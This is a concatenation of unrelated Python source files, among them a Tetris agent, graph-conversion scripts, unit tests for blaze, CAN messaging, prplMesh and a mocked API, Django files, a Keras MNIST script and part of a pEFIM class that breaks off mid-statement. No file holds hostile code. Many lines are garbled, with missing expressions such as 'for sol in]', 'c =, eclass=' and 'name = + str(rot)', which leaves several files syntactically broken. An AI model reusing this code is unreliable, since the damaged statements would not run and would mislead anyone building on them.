import asyncio import getpass import json import os import websockets from shape import S, Z, I, O, J, T, L, Shape from search import * async def agent_loop(server_address="localhost:8000", agent_name="student"): async with websockets.connect(f"ws://{server_address}/player") as websocket: # Receive information about static game properties await websocket.send(json.dumps({"cmd": "join", "name": agent_name})) initial_info = json.loads( await websocket.recv() ) # receive game update, this must be called timely or your game will get out of sync with the server shapes_keys = shapesKeys(SHAPES,initial_info) A = -0.510066 B = -0.184483 C = -0.35663 D = 0.760666 variables = [A,B,C,D] new_piece = True #variavel para saber é uma nova peça e, assim, calcular a search tree keys = [] # isto pode ser um array de arrays, cada sub-array é o conjunto de chaves para uma das peças especificas no lookahead first_piece = True #quando está é true, temos de usar o search() e calcular as keys consoante o lookahead all_keys = [] # grid = {(tup[0],tup[1]) for tup in initial_info['grid']} # x = max(grid, key = lambda coord : coord[0])[0] + 1 # y = max(grid, key = lambda coord : coord[1])[1] # print(x,y) while True: try: state = json.loads( await websocket.recv() ) # receive game update, this must be called timely or your game will get out of sync with the server if keys: await websocket.send( json.dumps({"cmd": "key", "key": keys.pop(0)}) ) # Peça recebida if 'piece' in state: piece = state['piece'] next_pieces = state['next_pieces'] # apenas a prineira peça game_speed = state['game_speed'] else: piece = None # A peça foi encaixada, não existindo nenhuma nova, por agora if piece is None: new_piece = True # Nova peça elif new_piece: # Caso a peça faça parte do lookahead de uma peça anterior (só verifica se keys existe porque o pop das keys ja acontece acima) if not first_piece: # se todas as chaves/keys do lookahead já foram enviadas, então acabou e a próxima peça recebida vai fazer o search if not all_keys: first_piece = True else: new_piece = False keys = all_keys.pop(0) # Encontrar a melhor solução para a nova peça elif first_piece: current_shape = findShape(piece) next_shapes = [findShape(shape) for shape in next_pieces] shapes = None if game_speed <= 25: # lookahead 3 shapes = [current_shape] + next_shapes[:] elif game_speed > 25 and game_speed < 32: #lookahead 2 shapes = [current_shape] + next_shapes[:-1] elif game_speed >= 32: #lookahead 1 shapes = [current_shape] + next_shapes[:-2] #shapes = [current_shape] + next_shapes[:-2] s = Search(state,initial_info,shapes,variables,shapes_keys) all_keys = None try: all_keys = [sol.keys for sol in] except: all_keys = [["s"]]*len(shapes) keys = all_keys.pop(0) new_piece = False first_piece = False except websockets.exceptions.ConnectionClosedOK: print("Server has cleanly disconnected us") return def shapesKeys(shapes, initial_info): grid = {(tup[0],tup[1]) for tup in initial_info['grid']} x = max(grid, key = lambda coord : coord[0])[0] + 1 shapekeys = dict() #dicionario q guarda shape+rotation e todas as teclas possiveis no tabuleiro deça peça para essa rotaçao for fshape in shapes: # para cada shape existente vai descobrir TODAS as combinaçoes de teclas q podem ser premidas fshape.set_pos((x - fshape.dimensions.x) / 2, 0) for rot in range(0, len(fshape.plan)): # loop para fazer cada rotaçao da peça atual _fs = copy(fshape) _fs.rotate(rot) min_x = min(_fs.positions, key=lambda coords: coords[0])[0] max_x = max(_fs.positions, key=lambda coords: coords[0])[0] name = + str(rot) # percorrer colunas [1,8] for a in range(1, x-1): x_differential = a - min_x # dispensa soluções não válidas if (x_differential + max_x >= x - 1): break keys = ["w"]*rot keys += ["a"]*abs(x_differential) + ["s"] if x_differential < 0 else ["d"]*abs(x_differential) + ["s"] shapekeys.setdefault(name, []).append(keys) return shapekeys def findShape(piece): #S (done) if piece[0][0] == piece[1][0] and piece[1][1] == piece[2][1] and piece[2][0] == piece[3][0]: fshape = Shape(S) #Z (done) elif piece[0][0] == piece[2][0] and piece[1][1] == piece[2][1] and piece[1][0] == piece[3][0]: fshape = Shape(Z) #I (done) elif piece[0][1] == piece[1][1] and piece[1][1] == piece[2][1] and piece[2][1] == piece[3][1]: fshape = Shape(I) #O (done) elif piece[0][0] == piece[2][0] and piece[0][1] == piece[1][1] and piece[1][0] == piece[3][0] and piece[2][1] == piece[3][1]: fshape = Shape(O) #J (done) elif piece[0][1] == piece[1][1] and piece[0][0] == piece[2][0] and piece[2][0] == piece[3][0]: fshape = Shape(J) #T (done) elif piece[0][0] == piece[1][0] and piece[1][1] == piece[2][1] and piece[1][0] == piece[3][0]: fshape = Shape(T) #L (done) elif piece[0][0] == piece[1][0] and piece[1][0] == piece[2][0] and piece[2][1] == piece[3][1]: fshape = Shape(L) return fshape # DO NOT CHANGE THE LINES BELLOW # You can change the default values using the command line, example: # $ NAME='arrumador' python3 loop = asyncio.get_event_loop() SERVER = os.environ.get("SERVER", "localhost") PORT = os.environ.get("PORT", "8000") NAME = os.environ.get("NAME", getpass.getuser()) loop.run_until_complete(agent_loop(f"{SERVER}:{PORT}", NAME))
import sys import time def gen_continuous_id_graph(inputFile, outputFile, isUndirected=False): with open(inputFile, 'r') as fin, open(outputFile, 'w') as fout: cur_idx = 0 idmap = {} for line in fin: if line.startswith('#') or line.startswith('%'): continue org_u,org_v = line.split() if org_u not in idmap: idmap[org_u] = cur_idx cur_idx += 1 if org_v not in idmap: idmap[org_v] = cur_idx cur_idx += 1 u = idmap[org_u] v = idmap[org_v] fout.write(str(u) + '\t' + str(v) + '\n') if isUndirected: fout.write(str(v) + '\t' + str(u) + '\n') print 'cur_idx=', cur_idx def gen_orgorder_graph(inputFile, outputFile, isUndirected=False): edges = [] org_id_map = {} org_id_list = [] with open(inputFile, 'r') as fin: for line in fin: if line.startswith('#') or line.startswith('%'): continue org_u,org_v = line.split() u = int(org_u) v = int(org_v) if (u not in org_id_map): org_id_map[u] = u org_id_list.append(u) if (v not in org_id_map): org_id_map[v] = v org_id_list.append(v) edges.append((u, v)) org_id_list.sort() for i in xrange(len(org_id_list)): org_id_map[org_id_list[i]] = i for i in xrange(len(edges)): u,v = org_id_map[edges[i][0]],org_id_map[edges[i][1]] edges[i] = (u,v) # edges.sort() with open(outputFile, 'w') as fout: for u,v in edges: fout.write(str(u) + ' ' + str(v) + '\n') if isUndirected: fout.write(str(v) + ' ' + str(u) + '\n') if __name__ == "__main__": # get_types(sys.argv[1], sys.argv[2]) isUndirected = False if (len(sys.argv) > 3 and sys.argv[3] == '-u'): isUndirected = True time_start = time.time() gen_continuous_id_graph(sys.argv[1], sys.argv[2], isUndirected) # gen_orgorder_graph(sys.argv[1], sys.argv[2], isUndirected) time_end = time.time() time_cost = (time_end - time_start) * 100.0 print 'time_cost = %.3fms' % time_cost
import os.path from blaze.test_utils import temp_dir import blaze.toplevel as toplevel from blaze.params import params from blaze import dshape from blaze.sources.chunked import CArraySource, CTableSource from blaze.eclass import eclass def test_open_carray(): with temp_dir() as temp: # Create an array on disk array_filename = os.path.join(temp, 'carray') p = params(storage=array_filename) ds = dshape('1,int32') a = CArraySource([2], dshape=ds, params=p) del a # Open array with open function uri = 'carray://' + array_filename c = assert c.datashape == ds # Test delayed mode c =, eclass=eclass.delayed) assert c.datashape == ds def test_open_ctable(): with temp_dir() as temp: # Create an table on disk table_filename = os.path.join(temp, 'ctable') p = params(storage=table_filename) ds = dshape('1,{ x: int32; y: int32 }') t = CTableSource(data=[(1, 1), (2, 2)], dshape=ds, params=p) del t # Open table with open function uri = 'ctable://' + table_filename c = assert c.datashape == ds # Test delayed mode c =, eclass=eclass.delayed) assert c.datashape == ds
<filename>xframes/ # Row comparison wrapper for ascending or descending comparison. class CmpRows(object): """ Comparison wrapper for a row. Rows can be sorted on one or more columns, and each one may be ascending or descending. This class wraps the row, remembers the column indexes used for comparing the rows, and each ones ascending/descending flag. It provides the needed comparison functions for sorting. Rows are assumed to be indexable collections of values. Values may be any python type that itself is comparable. The underlying python comparison functions are used on these values. """ def __init__(self, row, indexes, ascending): """ Instantiate a wrapped row. """ self.row = row self.indexes = indexes self.ascending = ascending def less(self, other): """ True if self is less than other. Comparison is reversed when a row is marked descending. """ for index, ascending in zip(self.indexes, self.ascending): left = self.row[index] right = other.row[index] if left < right: return ascending if left > right: return not ascending return False def greater(self, other): """ True if self is greater than other. Comparison is reversed when a row is marked descending. """ for index, ascending in zip(self.indexes, self.ascending): left = self.row[index] right = other.row[index] if left > right: return ascending if left < right: return not ascending return False def equal(self, other): """ True when self is equal to other. Only comparison fields are used in this test. """ for index in self.indexes: left = self.row[index] right = other.row[index] if left > right: return False if left < right: return False return True # These are the comparison interface def __lt__(self, other): return self.less(other) def __gt__(self, other): return self.greater(other) def __eq__(self, other): return self.equal(other) def __le__(self, other): return self.less(other) or self.equal(other) def __ge__(self, other): return self.greater(other) or self.equal(other) def __ne__(self, other): return not self.equal(other)
<filename>projects/baby_driver/scripts/ """This Module Tests methods in""" # pylint: disable=unused-import import unittest from unittest.mock import patch, Mock import can import cantools import can_util from message_defs import BABYDRIVER_DEVICE_ID from can_send import can_send_raw, load_dbc, can_send class TestCanSendRaw(unittest.TestCase): """Tests functions in Babydriver's can_send module""" @patch('can_util.send_message') def test_can_send_raw_parameters(self, mock_send_message): """Tests accuracy of parameters passed into can_send_raw""" # Stores parameters passed into can_util.send_message # pylint: disable=attribute-defined-outside-init self.msg_id = None = None self.device_id = None = None # pylint: disable=missing-docstring def parameter_test(msg_id, data, device_id=BABYDRIVER_DEVICE_ID, channel=None): self.msg_id = msg_id = data self.device_id = device_id = channel # Checks whether parameters passed into can_send_raw match # parameters passed into parameter_test mock_send_message.side_effect = parameter_test can_send_raw(0, [10, 255, 0], BABYDRIVER_DEVICE_ID, None) self.assertEqual(0, self.msg_id) self.assertEqual([10, 255, 0], self.assertEqual(BABYDRIVER_DEVICE_ID, self.device_id) self.assertEqual(None, @patch('can_util.send_message') def test_can_send_raw_fail(self, mock_send_message): """Tests that can_send_raw raises an Exception if CAN msg fails to send""" mock_send_message.side_effect = can.CanError mock_msg_id = 0 mock_data = [0, 0, 255] self.assertRaises(Exception, can_send_raw, mock_msg_id, mock_data) @patch('cantools.database.load_file') def test_load_dbc_fail(self, mock_cantools_load_file): """Tests that load_dbc raises an Exception if no file is found""" mock_cantools_load_file.side_effect = can.CanError self.assertRaises(Exception, load_dbc, "./some-file-path") @patch('cantools.database.load_file') @patch('can_util.get_bus') def test_can_send_parameters(self, mock_get_bus, mock_load_file): """Tests accuracy of paramters passed into can_send""" # pylint: disable=attribute-defined-outside-init self.arbitration_id = None = None # pylint: disable=missing-docstring def parameter_test(can_msg): self.arbitration_id = can_msg.arbitration_id = # Creates mock object with frame_id attribute and encode function msg_obj = Mock() msg_obj.frame_id = 1 msg_obj.encode.return_value = [1, 2] # Calling bus.send() triggers parameter test can_msg = Mock() can_msg.send.return_value = 3 can_msg.send.side_effect = parameter_test database = Mock() database.get_message_by_name.return_value = msg_obj mock_load_file.return_value = database mock_get_bus.return_value = can_msg # dbc_database must be initialized before using can_send load_dbc("./some_file_path") can_send("some message", "vcan0", time=20) self.assertEqual(1, self.arbitration_id) self.assertEqual(bytearray(b'\x01\x02'), @patch('cantools.database.load_file') def test_can_send_fail(self, mock_load_file): """Tests that can_send raises an Exception if msg_obj data cannot be encoded""" msg_obj = Mock() msg_obj.frame_id = 1 # An error is raised when msg_obj data is encoded msg_obj.encode.side_effect = can.CanError database = Mock() database.get_message_by_name.return_value = msg_obj mock_load_file.return_value = database # dbc_database must be initialized before using can_send load_dbc("./some_file_path") self.assertRaises(Exception, can_send, "some message") if __name__ == '__main__': unittest.main()
"""Module providing miscellaneous utilities used by cmkinitramfs""" from __future__ import annotations import functools import hashlib import os.path # Function needed for python < 3.9 def removeprefix(string: str, prefix: str) -> str: """Remove a prefix from a string Add support for :meth:`str.removeprefix` for Python < 3.9. :param string: String to remove prefix from :param prefix: Prefix to remove """ # return string.removeprefix(prefix) if string.startswith(prefix): return string[len(prefix):] return string def normpath(path: str) -> str: """Normalize path (actually eliminates double slashes) :param path: Path to normalize """ return os.path.normpath(path).replace('//', '/') @functools.lru_cache() def hash_file(filepath: str, chunk_size: int = 65536) -> bytes: """Calculate the SHA512 of a file :param filepath: Path of the file to hash :param chunk_size: Number of bytes per chunk of file to hash :return: File hash in a :class:`bytes` object """ sha512 = hashlib.sha512() with open(filepath, 'rb') as src: for chunk in iter(lambda:, b''): sha512.update(chunk) return sha512.digest()
f = open("stdList.tsv").readlines() obj = "" data = [] for txtLine in f: data = txtLine.split('\t') obj += "{value:'" + data[0] + "', label:'"+ data[0] + " " + data[2] + " (" + data[1] + " " + data[3].replace('\n','') + ")'}," + "\n" print(obj) obj = str('['+ obj +']').replace(',]',']') save = open("mahor_th_en.js", "w") save.write(obj)
<reponame>SayanGhoshBDA/code-backup from tkinter import StringVar, Tk, Label, Checkbutton, IntVar def update_label(): if var.get() == 1: label_text.set("On") else: label_text.set("Off") window = Tk() label_text = StringVar() label = Label(window, textvariable=label_text) label_text.set("Off") var = IntVar() check= Checkbutton(window, text="On", variable=var, onvalue=1, offvalue=0, command=update_label) label.pack() check.pack(side="left") window.mainloop()
# Generated by Django 3.2 on 2022-04-08 15:01 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('travellifestyleblog22', '0008_alter_category_image'), ] operations = [ migrations.RemoveField( model_name='category', name='image', ), ]
import os os.environ['TF_CPP_MIN_LOG_LEVEL']= '2' import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers from tensorflow.keras.datasets import mnist physical_devices = tf.config.list_physical_devices('GPU') print(physical_devices) (x_train, y_train), (x_test, y_test) = mnist.load_data() x_train = x_train.reshape(-1, 28*28).astype("float32") / 255.0 x_test = x_test.reshape(-1, 28*28).astype("float32") / 255.0 #Sequential API model = keras.Sequential( [ layers.Dense(512,activation='relu'), layers.Dense(216, activation = 'relu'), layers.Dense(10) ] ) model.compile( loss= keras.losses.SparseCategoricalCrossentropy(from_logits=True), optimizer=keras.optimizers.Adam(lr=0.001), metrics=["accuracy"], ),y_train,batch_size=32,epochs=5,verbose=2) model.evaluate(x_test, y_test, batch_size= 32, verbose=2)
from django.conf.urls import url import payments.views urlpatterns = [ url(r"^webhook/$", payments.views.webhook, name="webhook"), ]
############################################################### # SPDX-License-Identifier: BSD-2-Clause-Patent # SPDX-FileCopyrightText: 2020 the prplMesh contributors (see # This code is subject to the terms of the BSD+Patent license. # See LICENSE file for more details. ############################################################### from .prplmesh_base_test import PrplMeshBaseTest from boardfarm.exceptions import SkipTest from capi import tlv from opts import debug import time class BeaconReportQueryAndResponse(PrplMeshBaseTest): ''' This test verifies that a MAUT with an associated STA responds to a Beacon Metrics Query by sending a Beacon Report request to its associated STA, receiving a response from the STA, and sending the contents of that response in a Beacon Metrics Response message to the Controller ''' def runTest(self): # Locate test participants try: sta = agent = controller = except AttributeError as ae: raise SkipTest(ae) sniffer = sniffer.start(self.__class__.__name__ + "-" + # Step 3. MAUT sends Association Response frame to STA sta.wifi_connect_check(agent.radios[0].vaps[0]) time.sleep(1) debug("Send Associated STA Link Metrics Query message") mid = controller.ucc_socket.dev_send_1905( agent.mac, self.ieee1905['eMessageType']['ASSOCIATED_STA_LINK_METRICS_QUERY_MESSAGE'], tlv(self.ieee1905['eTlvTypeMap']['TLV_STAMAC_ADDRESS_TYPE'], sta.mac)) time.sleep(5) debug("STA sends a valid Association Request frame to MAUT") self.check_log(agent, "Send AssociatedStaLinkMetrics to controller, mid = {}".format(mid), timeout=20) self.check_cmdu_type_single("Associated STA Link Metrics Response", 0x800E, agent.mac, controller.mac, mid) # Step 4. Send Beacon Metrics Query to agent. agent.radios[0].send_bwl_event( "DATA RRM-BEACON-REP-RECEIVED {} channel=1 dialog_token=0 measurement_rep_mode=0 \ op_class=0 duration=50 rcpi=-80 rsni=10 bssid=aa: bb:cc:11:00:10".format(sta.mac)) '''- Operating Class field equal to 115 - Channel Number field equal to 255 - BSSID field equal to wildcard (0xFFFFFFFFFFFF) - Reporting Detail equal to 2 - SSID length field equal to 0 (SSID field missing) - Number of AP Channel Reports equal to 1 - Length of AP Channel Report equal to 0x03 - Operating Class in AP Channel Report equal to 115 - Channel List in AP Channel Report equal to 36 and 48 ''' beacon_query_tlv_val = "{sta_mac} ".format(sta_mac=sta.mac) beacon_query_tlv_val += "{0x73 0xFF 0xFFFFFFFFFFFF 0x02 0x00 0x01 0x03 0x73 0x24 0x30}" debug("Send Beacon Metrics Query from controller to agent.") mid = controller.ucc_socket.dev_send_1905( agent.mac, self.ieee1905['eMessageType']['BEACON_METRICS_QUERY_MESSAGE'], tlv(self.ieee1905['eTlvTypeMap']['TLV_BEACON_METRICS_QUERY'], beacon_query_tlv_val)) # Step 5. Verify that MAUT sends a 1905 ACK to Controller. time.sleep(1) self.check_cmdu_type_single( "ACK", self.ieee1905['eMessageType']['ACK_MESSAGE'], agent.mac, controller.mac, mid) debug("Confirming ACK message was received.") # Step 6. Verify that MAUT sends a correct Beacon request to STA. time.sleep(1) self.check_log(agent.radios[0], r"BEACON_METRICS_QUERY") debug("Confirming that MAUT sends a Beacon request to STA.") # Step 7. STA responds with Beacon report time.sleep(1) self.check_log(controller, r"got beacon response from STA. mid:", timeout=10) # Step 8. MAUT sends Beacon Metrics Response to Controller beacon_resp = self.check_cmdu_type_single( "Agent send Beacon Response to controller.", self.ieee1905['eMessageType']['BEACON_METRICS_RESPONSE_MESSAGE'], agent.mac, controller.mac) debug("Confirming MAUT sends Beacon Metrics Response to Controller.") beacon_resp_tlv = self.check_cmdu_has_tlv_single(beacon_resp, 154) ''' Don't check Beacon Metrics measurement report, as it's always empty ''' assert beacon_resp_tlv.beacon_metrics_mac_addr == sta.mac, \ "Wrong beacon metrics mac addr in Beacon Respond" sta.wifi_disconnect(agent.radios[0].vaps[0])
import unittest import requests from assertpy import assert_that from requests.exceptions import Timeout from unittest.mock import Mock, patch from src.Api import Api from src.todos import todos class TestApiMonkeyPatch(unittest.TestCase): @patch('src.Api.Api', autospec=True) def test_method_api_delete_raises_timeout(self, mock_class): mock_id = Mock() mock_id.return_value = 1 mock_class.api_delete.side_effect = Timeout with self.assertRaises(Timeout): mock_class.api_delete(mock_id) def test_method_api_delete_assert_that_called_once(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_api.api_delete(mock_id) mock_api.api_delete.assert_called_once() def test_method_api_delete_assert_that_called(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_id2 = Mock() mock_id2.return_value = 2 mock_api.api_delete(mock_id) mock_api.api_delete(mock_id2) mock_api.api_delete.assert_called() def test_method_api_delete_assert_that_not_called(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_api.api_delete.assert_not_called() def test_method_api_delete_assert_that_called_with_id_1(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_api.api_delete(mock_id) mock_api.api_delete.assert_called_with(mock_id) def test_method_api_delete_assert_that_called_once_with_id_1(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_api.api_delete(mock_id) mock_api.api_delete.assert_called_once_with(mock_id) def test_method_api_delete_assert_that_response_has_status_code_200(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = 1 mock_api.api_delete.return_value = {"delete_id": todo_id, "deleted_data": todos[todo_id - 1], "status_code": 200} response = mock_api.api_delete(todo_id) assert_that(response).has_status_code(200) def test_method_api_delete_assert_that_response_status_code_is_not_200(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = 1 mock_api.api_delete.return_value = {"status_code": 408} response = mock_api.api_delete(todo_id) assert_that(response["status_code"]).is_not_equal_to(200) def test_method_api_delete_assert_that_response_is_instance_of_dict(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = 1 mock_api.api_delete.return_value = {"delete_id": todo_id, "deleted_data": todos[todo_id - 1], "status_code": 200} response = mock_api.api_delete(todo_id) assert_that(response).is_instance_of(dict) def test_method_api_delete_assert_that_response_has_key_delete_id_1(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = 1 mock_api.api_delete.return_value = {"delete_id": todo_id, "deleted_data": todos[todo_id - 1], "status_code": 200} response = mock_api.api_delete(todo_id) assert_that(response).has_delete_id(1) def test_method_api_delete_assert_that_response_returns_deleted_data(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = 1 mock_api.api_delete.return_value = {"delete_id": todo_id, "deleted_data": todos[todo_id - 1], "status_code": 200} response = mock_api.api_delete(todo_id) assert_that(response["deleted_data"]).is_equal_to(todos[0]) def test_method_api_delete_assert_that_response_deleted_data_contain_all_keys_userId_id_title_completed(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = 1 mock_api.api_delete.return_value = {"delete_id": todo_id, "deleted_data": todos[todo_id - 1], "status_code": 200} response = mock_api.api_delete(todo_id) assert_that(response["deleted_data"]).contains_key("userId", "id", "title", "completed") def test_method_api_delete_assert_that_not_called_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_api.api_delete(mock_id) with self.assertRaises(AssertionError): mock_api.api_delete.assert_not_called() def test_method_api_delete_assert_that_called_once_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_id2 = Mock() mock_id2.return_value = 2 mock_api.api_delete(mock_id) mock_api.api_delete(mock_id2) with self.assertRaises(AssertionError): mock_api.api_delete.assert_called_once() def test_method_api_delete_assert_that_called_with_id_1_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_id2 = Mock() mock_id2.return_value = 2 mock_api.api_delete(mock_id2) with self.assertRaises(AssertionError): mock_api.api_delete.assert_called_with(mock_id) def test_method_api_delete_assert_that_called_once_with_id_1_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: mock_id = Mock() mock_id.return_value = 1 mock_id2 = Mock() mock_id2.return_value = 2 mock_api.api_delete(mock_id) mock_api.api_delete(mock_id2) with self.assertRaises(AssertionError): mock_api.api_delete.assert_called_once_with(mock_id) def test_method_api_delete_no_parameter_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: with self.assertRaises(TypeError): mock_api.api_delete() def test_method_api_delete_assert_that_response_returns_ValueError_when_called_with_id_0_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = 0 mock_api.api_delete.return_value = {"status_code": 408} mock_api.api_delete.side_effect = ValueError assert_that(mock_api.api_delete).raises(ValueError).when_called_with(todo_id) def test_method_api_delete_assert_that_response_returns_ValueError_when_called_with_id_300_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = 300 mock_api.api_delete.return_value = {"status_code": 408} mock_api.api_delete.side_effect = ValueError assert_that(mock_api.api_delete).raises(ValueError).when_called_with(todo_id) def test_method_api_delete_assert_that_response_returns_TypeError_when_called_with_id_not_int_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = "1" mock_api.api_delete.return_value = {"status_code": 408} mock_api.api_delete.side_effect = TypeError assert_that(mock_api.api_delete).raises(TypeError).when_called_with(todo_id) def test_method_api_delete_assert_that_response_returns_AttributeError_when_called_with_None_exception(self): with patch('src.Api.Api', autospec=True) as mock_api: todo_id = None mock_api.api_delete.return_value = {"status_code": 408} mock_api.api_delete.side_effect = AttributeError assert_that(mock_api.api_delete).raises(AttributeError).when_called_with(todo_id) if __name__ == '__main__': unittest.main()
""" Given an array of integers arr, return true if and only if it is a valid mountain array. Recall that arr is a mountain array if and only if: arr.length >= 3 There exists some i with 0 < i < arr.length - 1 such that: arr[0] < arr[1] < ... < arr[i - 1] < arr[i] arr[i] > arr[i + 1] > ... > arr[arr.length - 1] """ from typing import List def validMountainArray(arr: List[int]) -> bool: if len(arr) < 3: return False peak_index = 0 n = len(arr) for i in range(n-1): if arr[i] >= arr[i+1]: peak_index = i break if peak_index == 0: return False for i in range(peak_index, n-1): if arr[i] <= arr[i+1]: return False return True
<gh_stars>1-10 ''' usage: python bedgraph_file.bedgraph dataset.dat output.dat modify the DNASE score. ''' import sys bed = open(sys.argv[1]) inp = open(sys.argv[2]) out = open(sys.argv[3], 'w') inpl = inp.readlines() bedl = bed.readlines() for i in xrange(len(bedl)): bedl[i] = bedl[i].split() for i in xrange(len(inpl)): inpl[i] = inpl[i].split() print('Length of ' + sys.argv[1] + ': ' + str(len(bedl))) print('Length of ' + sys.argv[2] + ': ' + str(len(inpl))) cnt = 0 i = 0 line = '' for el in bedl: low = int(el[1]) high = int(el[2]) dnase = el[3] while True: elem = inpl[i] if int(elem[1]) <= high: line += str(elem[0]) + '\t' + str(elem[1]) + '\t' + str(elem[2]) + '\t' + str(elem[3]) + '\t' + str(elem[4]) + '\t' + str(dnase) + '\t' + str(elem[6]) + '\n' i += 1 if i == len(inpl): break else: break if i == len(inpl): break cnt += 1 for j in range(i, len(inpl)): elem = inpl[j] line += str(elem[0]) + '\t' + str(elem[1]) + '\t' + str(elem[2]) + '\t' + str(elem[3]) + '\t' + str(elem[4]) + '\t' + '0' + '\t' + str(elem[6]) + '\n' out.write(line) print('Length of ' + sys.argv[3] + ': ' + str(line.count('\n'))) inp.close() bed.close() out.close()
import dataclasses import typing as t from craftr.core.base import Action, ActionContext @dataclasses.dataclass class LambdaAction(Action): delegate: t.Callable[[ActionContext], None] def execute(self, context: ActionContext) -> None: self.delegate(context)
<gh_stars>0 import ast from requests import HTTPError from zoho_subscriptions.client.client import Client from zoho_subscriptions.subscriptions.addon import Addon try: from django.conf import settings as configuration except ImportError: try: import config as configuration except ImportError: print("Zoho configurations not found in config/django settings, must be passed while initializing") class Plan: add_on_types = ['recurring', 'one_time', ] def __init__(self, config=None): if config is None: self.client = Client(configuration.ZOHO_SUBSCRIPTION_CONFIG) else: self.client = Client(config) def list_plans(self, filters=None, with_add_ons=True, add_on_type=None): cache_key = 'plans' response = self.client.get_from_cache(cache_key) if response is None: list_of_plan_uri = 'plans' result = self.client.send_request("GET", list_of_plan_uri) response = result['plans'] self.client.add_to_cache(cache_key, response) if filters is not None: for plan in response: if (plan['name'] == filters['name'] or plan['plan_code'] == filters['plan_code']): return plan # if with_add_ons is not None: # if with_add_ons in add_on_type: # return None else: print("Returning from cache : " + cache_key) return response def get_plan(self, plan_code): cache_key = 'plan_%s' % plan_code response = self.client.get_from_cache(cache_key) if response is None: plan_by_plan_code = 'plans/%s' % plan_code result = self.client.send_request("GET", plan_by_plan_code) if type(result) is HTTPError: result_bytes = result.response._content result_dict = ast.literal_eval(result_bytes.decode('utf-8')) return result_dict['message'] else: response = result['plan'] self.client.add_to_cache(cache_key, response) else: print("Returning from cache : " + cache_key) return response def get_addons_for_plan(self,plan_code): cache_key = 'plans' addon_code_list = [] addon = Addon() response = self.client.get_from_cache(cache_key) if response is None: list_of_plan_uri = 'plans' result = self.client.send_request("GET", list_of_plan_uri) response = result['plans'] self.client.add_to_cache(cache_key, response) if plan_code is not None: for each_plan in response: if each_plan.get("addons"): if each_plan.get('plan_code')== plan_code: for each_addon_code in each_plan["addons"]: addon_code_list.append(addon.get_addon(each_addon_code['addon_code'])) return addon_code_list else: print("Returning from cache : " + cache_key) # Filter Plan def get_price_by_plan_code(self, plan_code): cache_key = 'plan_%s' % plan_code response = self.client.get_from_cache(cache_key) if response is None: plan_by_plan_code = 'plans/%s' % plan_code result = self.client.send_request("GET", plan_by_plan_code) if type(result) is HTTPError: result_bytes = result.response._content result_dict = ast.literal_eval(result_bytes.decode('utf-8')) return result_dict['message'] else: response = result['plan'] self.client.add_to_cache(cache_key, response) recurring_price = response['recurring_price'] return recurring_price else: print("Returning from cache : " + cache_key) return response
from .try_cuda import try_cuda
from .production import * try: from.local import * except: pass
from functools import cmp_to_key from Transaction import Transaction class pEFIM(): highUtilityItemsets = [] candidateCount = 0 utilityBinArrayLU = {} utilityBinArraySU = {} # a temporary buffer temp = [] for i in range(5000): temp.append(0) def __init__(self, mapItemsToneighbors, minUtility, itemsToExplore, itemsToKeep, transactions, newNamesToOldNames, oldNamesToNewNames): self.minUtil = minUtility self.Neighbours = mapItemsToneighbors self.itemsToExplore = itemsToExplore self.itemsToKeep = itemsToKeep self.transactions = transactions self.newNamesToOldNames = newNamesToOldNames self.oldNamesToNewNames = oldNamesToNewNames def runAlgo(self): # now we will sort the transactions according to proposed total order on transaction self.sortDatabase(self.transactions) self.backtrackingEFIM(self.transactions, self.itemsToKeep, self.itemsToExplore, 0) return (1, self.highUtilityItemsets) def backtrackingEFIM(self, transactionsOfP, itemsToKeep, itemsToExplore, prefixLength): self.candidateCount += len(itemsToExplore) for idx, e in enumerate(itemsToExplore): # caluclate the transactions containing p U {e} # at the same time project transactions to keep what appears after e transactionsPe = [] # variable to caluclate the utility of Pe utilityPe = 0 # merging transactions previousTransaction = transactionsOfP[0] consecutiveMergeCount = 0 for transaction in transactionsOfP: items = transaction.getItems() if e in items: # if e was found in the transaction positionE = items.index(e) if transaction.getLastPosition() == positionE: utilityPe += transaction.getUtilities()[positionE] + transaction.prefixUtility else: projectedTransaction = transaction.projectTransaction(positionE) utilityPe += projectedTransaction.prefixUtility if previousTransaction == transactionsOfP[0]: # if it is the first transactoin previousTransaction = projectedTransaction elif self.is_equal(projectedTransaction, previousTransaction): if consecutiveMergeCount == 0: # if the first consecutive merge items = previousTransaction.items[previousTransaction.offset:] utilities = previousTransaction.utilities[previousTransaction.offset:] itemsCount = len(items) positionPrevious = 0 positionProjection = projectedTransaction.offset while positionPrevious < itemsCount: utilities[positionPrevious] += projectedTransaction.utilities[positionProjection] positionPrevious += 1 positionProjection += 1 previousTransaction.prefixUtility += projectedTransaction.prefixUtility sumUtilities = previousTransaction.prefixUtility previousTransaction = Transaction(items, utilities, previousTransaction.transactionUtility + projectedTransaction.transactionUtility) previousTransaction.prefixUtility = sumUtilities else: positionPrevious = 0 positionProjected = projectedTransaction.offset itemsCount = len(previousTransaction.items) while positionPrevious < itemsCount: previousTransaction.utilities[positionPrevious] += projectedTransaction.utilities[ positionProjected] positionPrevious += 1 positionProjected += 1 previousTransaction.transactionUtility += projectedTransaction.transactionUtility previousTransaction.prefixUtility 